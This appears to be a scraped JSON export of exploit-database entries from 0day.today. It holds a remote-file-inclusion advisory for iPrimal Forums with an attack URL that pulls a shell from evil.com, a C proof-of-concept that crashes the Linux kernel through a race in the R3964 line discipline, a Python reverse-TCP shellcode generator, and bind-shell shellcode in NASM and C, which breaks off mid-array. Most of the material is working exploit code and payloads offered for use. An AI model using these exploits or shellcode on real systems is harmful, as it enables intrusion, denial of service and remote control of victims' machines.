{"hash": "95d210d7c388065a35279ed7ab8ceb3e8666d44b6d03fc910931c82fa8c106cb", "id": "1337DAY-ID-1134", "lastseen": "2018-01-02T11:26:40", "viewCount": 18, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "bac75cfe8f8f5989e6c056a14d851a39", "key": "href"}, {"hash": "3f0277ba7385e43bfcf8ef31cb8790b8", "key": "modified"}, {"hash": "3f0277ba7385e43bfcf8ef31cb8790b8", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "bafa6d7684416e40fbade4f7fd17604a", "key": "reporter"}, {"hash": "8376f2326242f0939f6425b0f683b88a", "key": "sourceData"}, {"hash": "e825c276cd92327a7569480dbac8f87e", "key": "sourceHref"}, {"hash": "ac4703624f7da219c29b310c427c95e5", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-31002", "1337DAY-ID-31003", "1337DAY-ID-30541", "1337DAY-ID-27847", "1337DAY-ID-23696", "1337DAY-ID-23495", "1337DAY-ID-21272", "1337DAY-ID-19928", "1337DAY-ID-18221"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148068", "PACKETSTORM:112542"]}, {"type": "exploitdb", "idList": ["EDB-ID:44846"]}, {"type": "nessus", "idList": ["SUSE_SU-2017-1835-1.NASL"]}, {"type": "fireeye", "idList": ["FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805601"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:7383", "SECURITYVULNS:DOC:3455", "SECURITYVULNS:VULN:1134", "SECURITYVULNS:VULN:879"]}], "modified": "2018-01-02T11:26:40"}, "vulnersScore": 5.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/1134", "description": "Exploit for unknown platform in category web applications", "title": "iPrimal Forums (admin/index.php) Remote File Include Vulnerability", "history": [{"bulletin": {"hash": "0427165a36ff3c209661ba9e70a09199c6c1b1c29b56db83bc19289a38b605ad", "id": "1337DAY-ID-1134", "lastseen": "2016-04-19T23:37:53", "enchantments": {"score": {"value": 5.5, "modified": "2016-04-19T23:37:53"}}, "hashmap": [{"hash": "1797368496274b48399f9f6c78775d96", "key": "sourceHref"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "3f0277ba7385e43bfcf8ef31cb8790b8", "key": "published"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8b39b64b11774d96f43a126ca3b8cd7c", "key": "href"}, {"hash": "3f0277ba7385e43bfcf8ef31cb8790b8", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "ac4703624f7da219c29b310c427c95e5", "key": "title"}, {"hash": "bafa6d7684416e40fbade4f7fd17604a", "key": "reporter"}, {"hash": "8293c43267ad11823e9aeefcdfb4ffff", "key": "sourceData"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/1134", "description": "Exploit for unknown platform in category web applications", "viewCount": 10, "title": "iPrimal Forums (admin/index.php) Remote File Include Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==================================================================\r\niPrimal Forums (admin/index.php) Remote File Include Vulnerability\r\n==================================================================\r\n\r\n\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\niPrimal Forums Remote File Inclusion\r\nFound by Bl0od3r\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nVulnerable Code: #line 126-129\r\n.....\r\nif($_GET['p'] == ''){\r\n\r\necho 'Please select an item from the menu above.';\r\n\r\n}else{\r\n\r\ninclude($_GET['p'].'.php');\r\n.....\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nAffected File:\r\n/admin/index.php =]\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nVulnerability:\r\nhttp://host.com/admin/index.php?p=http://evil.com/shell.txt?\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nGreetz:evilcookie,eddy14,matrix_killer\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2006-11-08T00:00:00", "references": [], "reporter": "Bl0od3r", "modified": "2006-11-08T00:00:00", "href": "http://0day.today/exploit/description/1134"}, "lastseen": "2016-04-19T23:37:53", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==================================================================\r\niPrimal Forums (admin/index.php) Remote File Include Vulnerability\r\n==================================================================\r\n\r\n\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\niPrimal Forums Remote File Inclusion\r\nFound by Bl0od3r\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nVulnerable Code: #line 126-129\r\n.....\r\nif($_GET['p'] == ''){\r\n\r\necho 'Please select an item from the menu above.';\r\n\r\n}else{\r\n\r\ninclude($_GET['p'].'.php');\r\n.....\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nAffected File:\r\n/admin/index.php =]\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nVulnerability:\r\nhttp://host.com/admin/index.php?p=http://evil.com/shell.txt?\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nGreetz:evilcookie,eddy14,matrix_killer\r\n\r\n\r\n\n# 0day.today [2018-01-02] #", "published": "2006-11-08T00:00:00", "references": [], "reporter": "Bl0od3r", "modified": "2006-11-08T00:00:00", "href": "https://0day.today/exploit/description/1134"}

{"zdt": [{"lastseen": "2019-04-24T11:58:28", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2019-04-23T00:00:00", "published": "2019-04-23T00:00:00", "id": "1337DAY-ID-32582", "href": "https://0day.today/exploit/description/32582", "title": "Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition Exploit", "type": "zdt", "sourceData": "Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition Exploit\r\n\r\n/*\r\nThe Siemens R3964 line discipline code in drivers/tty/n_r3964.c has a few races\r\naround its ioctl handler; for example, the handler for R3964_ENABLE_SIGNALS\r\njust allocates and deletes elements in a linked list with zero locking.\r\nThis code is reachable by an unprivileged user if the line discipline is enabled\r\nin the kernel config; Ubuntu 18.04, for example, ships this line discipline as a\r\nmodule.\r\n\r\nProof of concept:\r\n\r\n==================================\r\n[email\u00a0protected]:~/r3964$ cat r3964_racer.c\r\n*/\r\n\r\n#define _GNU_SOURCE\r\n#include <pthread.h>\r\n#include <fcntl.h>\r\n#include <sys/ioctl.h>\r\n#include <stdio.h>\r\n#include <err.h>\r\n#include <stdlib.h>\r\n#include <linux/n_r3964.h>\r\n\r\nstatic int ptm_fd, slave_fd;\r\n\r\nstatic void *thread_fn(void *dummy) {\r\n int res;\r\n while (1) {\r\n res = ioctl(slave_fd, R3964_ENABLE_SIGNALS, R3964_SIG_ALL);\r\n printf(\"R3964_ENABLE_SIGNALS: %d\\n\", res);\r\n res = ioctl(slave_fd, R3964_ENABLE_SIGNALS, 0);\r\n printf(\"R3964_ENABLE_SIGNALS: %d\\n\", res);\r\n }\r\n}\r\n\r\nint main(void) {\r\n ptm_fd = getpt();\r\n if (ptm_fd == -1) err(1, \"getpt\");\r\n if (unlockpt(ptm_fd)) err(1, \"unlockpt\");\r\n slave_fd = ioctl(ptm_fd, TIOCGPTPEER, O_RDWR);\r\n if (slave_fd == -1) err(1, \"TIOCGPTPEER\");\r\n\r\n printf(\"-----------------------------------------\\n\");\r\n system(\"ls -l /proc/$PPID/fd\");\r\n printf(\"-----------------------------------------\\n\");\r\n\r\n const int disc_r3964 = N_R3964;\r\n if (ioctl(slave_fd, TIOCSETD, &disc_r3964)) err(1, \"TIOCSETD\");\r\n\r\n pthread_t thread;\r\n if (pthread_create(&thread, NULL, thread_fn, NULL)) errx(1, \"pthread_create\");\r\n\r\n thread_fn(NULL);\r\n\r\n return 0;\r\n}\r\n\r\n/*\r\n[email\u00a0protected]:~/r3964$ gcc -o r3964_racer r3964_racer.c -pthread && ./r3964_racer\r\n[...]\r\n==================================\r\n\r\ndmesg splat:\r\n\r\n==================================\r\n[ 82.646953] r3964: Philips r3964 Driver $Revision: 1.10 $\r\n[ 82.656459] ------------[ cut here ]------------\r\n[ 82.656461] kernel BUG at /build/linux-Y38gIP/linux-4.15.0/mm/slub.c:296!\r\n[ 82.658396] invalid opcode: 0000 [#1] SMP PTI\r\n[ 82.659515] Modules linked in: n_r3964 joydev ipt_MASQUERADE nf_nat_masquerade_ipv4 nf_conntrack_netlink nfnetlink xfrm_user xfrm_algo iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 xt_addrtype iptable_filter xt_conntrack nf_nat nf_conntrack libcrc32c br_netfilter bridge stp llc aufs overlay snd_hda_codec_generic crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep ghash_clmulni_intel snd_pcm snd_seq_midi snd_seq_midi_event pcbc aesni_intel aes_x86_64 snd_rawmidi snd_seq snd_seq_device snd_timer snd crypto_simd glue_helper cryptd input_leds soundcore mac_hid 9pnet_virtio 9pnet serio_raw qemu_fw_cfg sch_fq_codel parport_pc ppdev lp parport ip_tables x_tables autofs4 virtio_gpu ttm floppy drm_kms_helper psmouse syscopyarea sysfillrect sysimgblt fb_sys_fops drm\r\n[ 82.677770] virtio_net i2c_piix4 pata_acpi\r\n[ 82.678849] CPU: 1 PID: 2209 Comm: r3964_racer Not tainted 4.15.0-42-generic #45-Ubuntu\r\n[ 82.680897] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014\r\n[ 82.683098] RIP: 0010:kfree+0x16a/0x180\r\n[ 82.684116] RSP: 0018:ffffb6b381d7fd50 EFLAGS: 00010246\r\n[ 82.685454] RAX: ffff9bb0b4770000 RBX: ffff9bb0b4770000 RCX: ffff9bb0b4770000\r\n[ 82.687285] RDX: 0000000000006e86 RSI: ffff9bb1bfca70a0 RDI: ffff9bb1bb003800\r\n[ 82.689247] RBP: ffffb6b381d7fd68 R08: ffffffffc0511db0 R09: ffffffffc051202c\r\n[ 82.691077] R10: ffffeb8c80d1dc00 R11: 0000000000000000 R12: ffff9bb1b3430e40\r\n[ 82.692906] R13: ffffffffc051202c R14: ffff9bb13b56e800 R15: ffff9bb12d1addd0\r\n[ 82.694726] FS: 00007ff9b92da740(0000) GS:ffff9bb1bfc80000(0000) knlGS:0000000000000000\r\n[ 82.696801] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 82.698421] CR2: 0000558cf9e32ec8 CR3: 00000000a513a005 CR4: 00000000003606e0\r\n[ 82.700259] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\r\n[ 82.702113] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\r\n[ 82.703946] Call Trace:\r\n[ 82.704602] r3964_ioctl+0x27c/0x2b0 [n_r3964]\r\n[ 82.705746] tty_ioctl+0x138/0x8c0\r\n[ 82.706631] ? __wake_up+0x13/0x20\r\n[ 82.707516] do_vfs_ioctl+0xa8/0x630\r\n[ 82.708610] ? vfs_write+0x166/0x1a0\r\n[ 82.709543] SyS_ioctl+0x79/0x90\r\n[ 82.710405] do_syscall_64+0x73/0x130\r\n[ 82.711357] entry_SYSCALL_64_after_hwframe+0x3d/0xa2\r\n[ 82.712659] RIP: 0033:0x7ff9b8bd45d7\r\n[ 82.713680] RSP: 002b:00007fffcd85bcf8 EFLAGS: 00000202 ORIG_RAX: 0000000000000010\r\n[ 82.715617] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff9b8bd45d7\r\n[ 82.717463] RDX: 0000000000000000 RSI: 0000000000005301 RDI: 0000000000000004\r\n[ 82.719411] RBP: 00007fffcd85bd20 R08: 0000000000000000 R09: 0000000000000000\r\n[ 82.721248] R10: 0000000000000000 R11: 0000000000000202 R12: 0000556df58ed820\r\n[ 82.723093] R13: 00007fffcd85be30 R14: 0000000000000000 R15: 0000000000000000\r\n[ 82.724930] Code: c4 80 74 04 41 8b 72 6c 4c 89 d7 e8 61 1c f9 ff eb 86 41 b8 01 00 00 00 48 89 d9 48 89 da 4c 89 d6 e8 8b f6 ff ff e9 6d ff ff ff <0f> 0b 48 8b 3d 6d c5 1c 01 e9 c9 fe ff ff 0f 1f 84 00 00 00 00 \r\n[ 82.729909] RIP: kfree+0x16a/0x180 RSP: ffffb6b381d7fd50\r\n[ 82.731310] ---[ end trace c1cd537c5d2e0b84 ]---\r\n==================================\r\n\r\n\r\nI've also tried this on 5.0-rc2 with KASAN on, which resulted in this splat:\r\n\r\n==================================\r\n[ 69.883056] ==================================================================\r\n[ 69.885163] BUG: KASAN: use-after-free in r3964_ioctl+0x288/0x3c0\r\n[ 69.886855] Read of size 8 at addr ffff8881e0474020 by task r3964_racer/1134\r\n[ 69.888820] \r\n[ 69.889251] CPU: 3 PID: 1134 Comm: r3964_racer Not tainted 5.0.0-rc2 #238\r\n[ 69.891729] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014\r\n[ 69.894535] Call Trace:\r\n[ 69.895223] dump_stack+0x71/0xab\r\n[ 69.896134] ? r3964_ioctl+0x288/0x3c0\r\n[ 69.897181] print_address_description+0x6a/0x270\r\n[ 69.898473] ? r3964_ioctl+0x288/0x3c0\r\n[ 69.899499] ? r3964_ioctl+0x288/0x3c0\r\n[ 69.900534] kasan_report+0x14e/0x192\r\n[ 69.901562] ? r3964_ioctl+0x288/0x3c0\r\n[ 69.902606] r3964_ioctl+0x288/0x3c0\r\n[ 69.903586] tty_ioctl+0x227/0xbd0\r\n[...]\r\n[ 69.917312] do_vfs_ioctl+0x134/0x8f0\r\n[...]\r\n[ 69.926807] ksys_ioctl+0x70/0x80\r\n[ 69.927709] __x64_sys_ioctl+0x3d/0x50\r\n[ 69.928734] do_syscall_64+0x73/0x160\r\n[ 69.929741] entry_SYSCALL_64_after_hwframe+0x44/0xa9\r\n[ 69.931099] RIP: 0033:0x7f6491542dd7\r\n[ 69.932068] Code: 00 00 00 48 8b 05 c1 80 2b 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 91 80 2b 00 f7 d8 64 89 01 48\r\n[ 69.937051] RSP: 002b:00007f6491460f28 EFLAGS: 00000206 ORIG_RAX: 0000000000000010\r\n[ 69.939067] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f6491542dd7\r\n[ 69.940977] RDX: 000000000000000f RSI: 0000000000005301 RDI: 0000000000000004\r\n[ 69.942905] RBP: 00007f6491460f50 R08: 0000000000000000 R09: 0000000000000018\r\n[ 69.944800] R10: 0000000000000064 R11: 0000000000000206 R12: 0000000000000000\r\n[ 69.947600] R13: 00007ffeb17a9b4f R14: 0000000000000000 R15: 00007f6491c42040\r\n[ 69.949491] \r\n[ 69.949923] Allocated by task 1131:\r\n[ 69.950866] __kasan_kmalloc.constprop.8+0xa5/0xd0\r\n[ 69.952147] kmem_cache_alloc_trace+0xfa/0x200\r\n[ 69.953352] r3964_ioctl+0x2e6/0x3c0\r\n[ 69.954333] tty_ioctl+0x227/0xbd0\r\n[ 69.955267] do_vfs_ioctl+0x134/0x8f0\r\n[ 69.956248] ksys_ioctl+0x70/0x80\r\n[ 69.957150] __x64_sys_ioctl+0x3d/0x50\r\n[ 69.958169] do_syscall_64+0x73/0x160\r\n[ 69.959148] entry_SYSCALL_64_after_hwframe+0x44/0xa9\r\n[ 69.960485] \r\n[ 69.960910] Freed by task 1131:\r\n[ 69.961764] __kasan_slab_free+0x135/0x180\r\n[ 69.962851] kfree+0x90/0x1d0\r\n[ 69.963660] r3964_ioctl+0x208/0x3c0\r\n[ 69.964631] tty_ioctl+0x227/0xbd0\r\n[ 69.965564] do_vfs_ioctl+0x134/0x8f0\r\n[ 69.966540] ksys_ioctl+0x70/0x80\r\n[ 69.967424] __x64_sys_ioctl+0x3d/0x50\r\n[ 69.968424] do_syscall_64+0x73/0x160\r\n[ 69.969414] entry_SYSCALL_64_after_hwframe+0x44/0xa9\r\n[ 69.970768] \r\n[ 69.971182] The buggy address belongs to the object at ffff8881e0474008\r\n[ 69.971182] which belongs to the cache kmalloc-64 of size 64\r\n[ 69.974429] The buggy address is located 24 bytes inside of\r\n[ 69.974429] 64-byte region [ffff8881e0474008, ffff8881e0474048)\r\n[ 69.977470] The buggy address belongs to the page:\r\n[ 69.978744] page:ffffea0007811d00 count:1 mapcount:0 mapping:ffff8881e600f740 index:0x0 compound_mapcount: 0\r\n[ 69.981316] flags: 0x17fffc000010200(slab|head)\r\n[ 69.982528] raw: 017fffc000010200 ffffea0007554508 ffffea0007811e08 ffff8881e600f740\r\n[ 69.984722] raw: 0000000000000000 0000000000270027 00000001ffffffff 0000000000000000\r\n[ 69.984723] page dumped because: kasan: bad access detected\r\n[ 69.984724] \r\n[ 69.984725] Memory state around the buggy address:\r\n[ 69.984727] ffff8881e0473f00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\r\n[ 69.984729] ffff8881e0473f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\r\n[ 69.984731] >ffff8881e0474000: fc fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc\r\n[ 69.984732] ^\r\n[ 69.984734] ffff8881e0474080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\r\n[ 69.984736] ffff8881e0474100: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc\r\n[ 69.984737] ==================================================================\r\n[ 69.984739] Disabling lock debugging due to kernel taint\r\n[ 69.996233] ==================================================================\r\n==================================\r\n\r\n\r\nI wonder whether it would, in addition to fixing the locking, also make sense to\r\ngate the line discipline on some sort of capability - it seems wrong to me that\r\nthis kind of code is exposed to every user on the system.\r\n*/\n\n# 0day.today [2019-04-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32582"}, {"lastseen": "2018-09-01T16:42:26", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2018-08-30T00:00:00", "published": "2018-08-30T00:00:00", "id": "1337DAY-ID-31003", "href": "https://0day.today/exploit/description/31003", "title": "Linux/x86 - IPv6 Reverse TCP Shellcode Generator (94 bytes)", "type": "zdt", "sourceData": "#!/usr/bin/env python3\r\n# Exploit Title: Linux x86 IPv6 Reverse TCP Shellcode Generator (94 bytes)\r\n# Shellcode Author: Kevin Kirsche\r\n# Shellcode Repository: https://github.com/kkirsche/SLAE/tree/master/assignment_2-reverse_shell\r\n# Tested on: Shell on Ubuntu 18.04 with gcc 7.3.0 / Connecting to Kali 2018.2\r\n \r\n# This shellcode will connect to fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509 on port 1337 and give you /bin/sh\r\n \r\n#This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:\r\n#http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/\r\n#Student ID: SLAE-1134\r\n \r\nfrom argparse import ArgumentParser\r\nfrom ipaddress import ip_address\r\nimport sys\r\n \r\nsc = (\"\\\\x31\\\\xdb\\\\x53\\\\x43\\\\x53\\\\x6a\\\\x0a\\\\x89\\\\xe1\\\\x6a\\\\x66\\\\x58\\\\xcd\\\\x80\"\r\n \"\\\\x96\\\\x99\\\\x52\\\\x68{ipv6_fourth_octet}\\\\x68{ipv6_third_octet}\\\\x68\"\r\n \"{ipv6_second_octet}\\\\x68{ipv6_first_octet}\\\\x52\\\\x66\\\\x68{port}\"\r\n \"\\\\x66\\\\x6a\\\\x0a\\\\x89\\\\xe1\\\\x6a\\\\x1c\\\\x51\\\\x56\\\\x89\\\\xe1\\\\x43\\\\x43\\\\x6a\"\r\n \"\\\\x66\\\\x58\\\\xcd\\\\x80\\\\x87\\\\xde\\\\x29\\\\xc9\\\\xb1\\\\x02\\\\xb0\\\\x3f\\\\xcd\\\\x80\"\r\n \"\\\\x49\\\\x79\\\\xf9\\\\x31\\\\xd2\\\\x52\\\\x68\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x68\\\\x2f\\\\x62\"\r\n \"\\\\x69\\\\x6e\\\\x89\\\\xd1\\\\x89\\\\xe3\\\\xb0\\\\x0b\\\\xcd\\\\x80\")\r\n \r\nif __name__ == '__main__':\r\n parser = ArgumentParser(description=(\"Dual Network Stack Bind Shell \"\r\n \"Generator\"))\r\n parser.add_argument('ip_address', type=str, nargs='?', default='fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509',\r\n help='The IP address to connect to (default fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509)')\r\n parser.add_argument('port', type=int, nargs='?', default=1337,\r\n help='The port to connect to (default 1337)')\r\n args = parser.parse_args()\r\n \r\n ip = ip_address(args.ip_address)\r\n ip_hex = ip.exploded\r\n \r\n if args.port < 1 or args.port > 65535:\r\n print('Invalid port. Please select a port between 1 and 65535')\r\n sys.exit(1)\r\n \r\n port = format(args.port, '04x')\r\n port = \"\\\\x{b}\\\\x{a}\".format(\r\n a=port[2:4],\r\n b=port[0:2]) \r\n \r\n split_hex_ip = ip_hex.split(':')\r\n ipv6_fourth_octet = '\\\\x{d}\\\\x{c}\\\\x{b}\\\\x{a}'.format(\r\n d=split_hex_ip[6][0:2],\r\n c=split_hex_ip[6][2:4],\r\n b=split_hex_ip[7][0:2],\r\n a=split_hex_ip[7][2:4])\r\n ipv6_third_octet = '\\\\x{d}\\\\x{c}\\\\x{b}\\\\x{a}'.format(\r\n d=split_hex_ip[4][0:2],\r\n c=split_hex_ip[4][2:4],\r\n b=split_hex_ip[5][0:2],\r\n a=split_hex_ip[5][2:4])\r\n ipv6_second_octet = '\\\\x{d}\\\\x{c}\\\\x{b}\\\\x{a}'.format(\r\n d=split_hex_ip[2][0:2],\r\n c=split_hex_ip[2][2:4],\r\n b=split_hex_ip[3][0:2],\r\n a=split_hex_ip[3][2:4])\r\n ipv6_first_octet = '\\\\x{d}\\\\x{c}\\\\x{b}\\\\x{a}'.format(\r\n d=split_hex_ip[0][0:2],\r\n c=split_hex_ip[0][2:4],\r\n b=split_hex_ip[1][0:2],\r\n a=split_hex_ip[1][2:4])\r\n \r\n if '\\\\x00' in port:\r\n print('[!] Warning: The port you chose contains a null value.')\r\n if (('\\\\x00' in ipv6_fourth_octet) or ('\\\\x00' in ipv6_third_octet) or\r\n ('\\\\x00' in ipv6_second_octet) or ('\\\\x00' in ipv6_first_octet)):\r\n print('[!] Warning: The IP address you chose contains a null value.')\r\n \r\n print('Shellcode:')\r\n print(sc.format(\r\n ipv6_first_octet=str(ipv6_first_octet),\r\n ipv6_second_octet=str(ipv6_second_octet),\r\n ipv6_third_octet=str(ipv6_third_octet),\r\n ipv6_fourth_octet=str(ipv6_fourth_octet),\r\n port=str(port)))\n\n# 0day.today [2018-09-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31003"}, {"lastseen": "2018-09-01T16:42:01", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2018-08-30T00:00:00", "published": "2018-08-30T00:00:00", "id": "1337DAY-ID-31002", "href": "https://0day.today/exploit/description/31002", "title": "Linux/x86 - Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode", "type": "zdt", "sourceData": "/*\r\n# Exploit Title: Linux x86 Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode\r\n# Shellcode Author: Kevin Kirsche\r\n# Shellcode Repository: https://github.com/kkirsche/SLAE/tree/master/assignment_1-bind_shell\r\n# Tested on: Shell on Ubuntu 18.04 with gcc 7.3.0 / Connected from Kali 2018.2\r\n \r\n# This shellcode will listen on port 1337 on all of the host's IPv4 and IPv6 addresses and give you /bin/sh\r\n \r\nThis shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:\r\nhttp://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/\r\nStudent ID: SLAE-1134\r\n \r\nCompilation instructions:\r\n gcc -o shellcode shellcode.c -fno-stack-protector -z execstack\r\n \r\nCommented NASM:\r\nglobal _start\r\n \r\nsection .text\r\n \r\n_start:\r\n ; socket\r\n ;; cleanup\r\n xor ebx, ebx\r\n ;; arguments\r\n push ebx ; #define IP_PROTO 0\r\n push 0x1 ; #define SOCK_STREAM 1\r\n push 0xa ; #define PF_INET6 10\r\n ;; function\r\n mov ecx, esp ; pointer to args on the stack into ecx\r\n push 0x66\r\n pop eax ; socketcall 0x66 == 102\r\n inc ebx ; #define SYS_SOCKET 1\r\n ;; call\r\n int 0x80\r\n ;; returned data\r\n xchg esi, eax ; sockfd eax -> esi\r\n \r\n ; setsocketopt\r\n ;; cleanup\r\n xor eax, eax\r\n ;; arguments\r\n push eax ; NO = 0x0\r\n mov edx, esp ; get a pointer to the null value\r\n push 0x2 ; sizeof(NO)\r\n push edx ; pointer to NO\r\n push 0x1a ; #define IPV6_V6ONLY 26\r\n push 0x29 ; #define IPPROTO_IPV6\r\n ;; function\r\n mov ecx, esp ; pointer to args on the stack into ecx\r\n mov al, 0x66 ; socketcall 0x66 == 102\r\n mov bl, 0xe ; #define SYS_SETSOCKOPT 14\r\n ;; call\r\n int 0x80\r\n \r\n ; bind ipv4\r\n ;; cleanup\r\n xor edx, edx\r\n ;; v4lhost struct\r\n push edx ; #define INADDR_ANY 0\r\n push word 0x3905 ; port 1337 in big endian format\r\n push 0x2 ; #define AF_INET 2\r\n ;; arguments\r\n mov ecx, esp ; pointer to v4lhost struct arguments\r\n push 0x10 ; sizeof v4lhost\r\n push ecx ; pointer v4lhost\r\n push esi ; push sockfd onto stack\r\n ;; function\r\n mov ecx, esp ; argument pointer into ecx\r\n mov bl, 0x2 ; #define SYS_BIND 2\r\n mov al, 0x66 ; socketcall 0x66 == 102\r\n ;; call\r\n int 0x80\r\n \r\n ; bind ipv6\r\n ;; cleanup\r\n xor eax, eax\r\n ;; v6lhost struct\r\n push dword eax ; v6_host.sin6_addr\r\n push dword eax\r\n push dword eax\r\n push dword eax\r\n push dword eax\r\n push word 0x3905 ; port 1337\r\n push word 0x0a ; PF_INET6\r\n ;; arguments\r\n mov ecx, esp ; pointer to struct into ecx\r\n push 0x1c ; sizeof struct\r\n push ecx ; pointer to struct\r\n push esi ; sockfd\r\n ;; function\r\n mov ecx, esp ; arguments into register\r\n mov bl, 0x2 ; #define SYS_BIND 2\r\n mov al, 0x66 ; socketcall 0x66 == 102\r\n ;; call\r\n int 0x80\r\n \r\n ; listen\r\n ;; arguments\r\n push byte 0x2 ; queuelimit = 2\r\n push esi ; sockfd\r\n ;; function\r\n mov ecx, esp ; pointer to args into ecx\r\n mov bl, 0x4 ; #define SYS_LISTEN 4\r\n mov al, 0x66 ; socketcall 0x66 == 102\r\n ;; call\r\n int 0x80\r\n \r\n ; accept\r\n ;; cleanup\r\n xor ebx, ebx\r\n ;;arguments\r\n push ebx ; push NULL\r\n push ebx ; push NULL\r\n push esi ; sockfd\r\n ;; function\r\n mov ecx, esp ; pointer to args into ecx\r\n mov bl, 0x5 ; #define SYS_ACCEPT 5\r\n mov al, 0x66 ; socketcall 0x66 == 102\r\n ;; call\r\n int 0x80\r\n ;; returned data\r\n xchg ebx, eax ; ebx holds the new sockfd that we accepted\r\n \r\n ; dup file descriptor\r\n ;; setup counters\r\n sub ecx, ecx ; zero out ecx\r\n mov cl, 0x2 ; create a counter\r\n ;; loop\r\nduploop:\r\n mov al, 0x3f ; SYS_DUP2 syscall\r\n int 0x80 ; call SYS_DUP2\r\n dec ecx ; decrement loop counter\r\n jns duploop ; as long as SF is not set, keep looping\r\n \r\n ; execve\r\n ;; cleanup\r\n xor edx, edx\r\n ;; command to run\r\n push edx ; NULL string terminator\r\n push 0x68732f2f ; hs//\r\n push 0x6e69622f ; nib/\r\n ;; arguments\r\n mov ebx, esp ; pointer to args into ebx\r\n push edx ; null ARGV\r\n push ebx ; command to run\r\n ;; function\r\n mov ecx, esp\r\n mov al, 0x0b ; execve systemcall\r\n int 0x80\r\n*/\r\n#include <stdio.h>\r\n#include <string.h>\r\n \r\nunsigned char code[] = \"\\x31\\xdb\\x53\\x6a\\x01\\x6a\\x0a\\x89\\xe1\\x6a\\x66\\x58\\x43\"\r\n \"\\xcd\\x80\\x96\\x31\\xc0\\x50\\x89\\xe2\\x6a\\x02\\x52\\x6a\\x1a\\x6a\\x29\\x89\\xe1\\xb0\"\r\n \"\\x66\\xb3\\x0e\\xcd\\x80\\x31\\xd2\\x52\\x66\\x68\\x05\\x39\\x6a\\x02\\x89\\xe1\\x6a\\x10\"\r\n 